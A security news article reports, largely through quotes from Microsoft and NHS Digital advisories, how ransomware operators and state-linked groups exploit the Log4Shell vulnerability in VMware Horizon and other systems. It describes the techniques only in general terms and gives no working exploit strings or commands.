Security news that informs and inspires

China-Based Actors Using Log4Shell Bug for Ransomware Deployment

A China-based group that has deployed ransomware in the past is currently exploiting the Log4Shell vulnerability in some versions of the VMware Horizon server to gain initial access and eventually install the NightSky ransomware.

The group, which MIcrosoft researchers refer to as DEV-0401, is one of many groups known to be exploiting the Log4Shell vulnerability (CVE-2021-44228). Many of those groups are using the flaw to get a foothold on a target network and then drop webshells, RATs, or other malware to maintain persistence and then move laterally throughout the network. Researchers have also reported seeing ransomware deployments in some isolated intrusions. The group that Microsoft has identified as installing the NightSky ransomware is not one of the major, known APT teams, but is taking advantage of the easy availability of exploit code and the large number of vulnerable servers exposed to the Internet.

“These attacks are performed by a China-based ransomware operator that we’re tracking as DEV-0401. DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo, and Rook, and has similarly exploited Internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473). Based on our analysis, the attackers are using command and control (CnC) servers that spoof legitimate domains,” Microsoft Threat Intelligence Center analysts said Monday.

Last week, analysts at the UK’s National Health Service Digital warned that other attackers were targeting the Log4Shell vulnerability in VMware Horizon server versions 7.x and 8.x to install webshells for persistent access. Those attacks were targeting the Apache Tomcat service on vulnerable servers and the actors running the operations are using a specific PowerShell command spawned by the Tomcat service and eventually restart the VMBLastSG service and install a small listener to communicate with the C2 service.

“The commands are stored as a header object (named 'data') in the crafted requests. This process is used to establish persistent communication with a command and control server that could then be used to carry out other malicious activities such as deploying additional malicious software, data exfiltration, or deployment of ransomware,” the advisory says.

Microsoft researchers said that they began seeing the DEV-0401 attackers exploiting the Log4Shell flaw to install ransomware on Jan. 4. But those intrusions are only one piece of a much larger picture. APT teams, cybercrime groups, and many other actors all have been exploiting the Log4Shell bug, which is a vulnerability in the Apache Log4j tool, a ubiquitous logging utility that is used in an untold number of applications and tools.

The first vulnerability was disclosed in mid-December and attacks had already begun by that time. Researchers soon discovered several other vulnerabilities in Log4j that can lead to remote code execution, as well. Affected vendors and maintainers of vulnerable open source projects have scrambled to release fixes and defenders have spent the last few weeks working to ge them in place and identify all of the weak spots in their infrastructure. In the meantime, attackers have taken advantage of the chaos to scan for vulnerable systems and target them with exploits.

"HAFNIUM, a threat actor group operating out of China, has been observed utilizing the vulnerability to attack virtualization infrastructure."

“Microsoft has observed rapid uptake of the vulnerability into existing botnets like Mirai, existing campaigns previously targeting vulnerable Elasticsearch systems to deploy cryptocurrency miners, and activity deploying the Tsunami backdoor to Linux systems. Many of these campaigns are running concurrent scanning and exploitation activities for both Windows and Linux systems, using Base64 commands included in the JDNI:ldap:// request to launch bash commands on Linux and PowerShell on Windows,” MSTIC said.

“Microsoft has also continued to observe malicious activity performing data leakage via the vulnerability without dropping a payload. This attack scenario could be especially impactful against network devices that have SSL termination, where the actor could leak secrets and data.”

Microsoft researchers and others have also observed attackers installing a variety of other malware post-exploitation, as well, and have identified a number of individual APT groups that are exploiting the Log4Shell bug.

“For example, MSTIC has observed PHOSPHORUS, an Iranian actor known to deploy ransomware, acquiring and making modifications of the Log4j exploit. We assess that PHOSPHORUS has operationalized these modifications,” MSTIC said.

“In addition, HAFNIUM, a threat actor group operating out of China, has been observed utilizing the vulnerability to attack virtualization infrastructure to extend their typical targeting. In these attacks, HAFNIUM-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems.”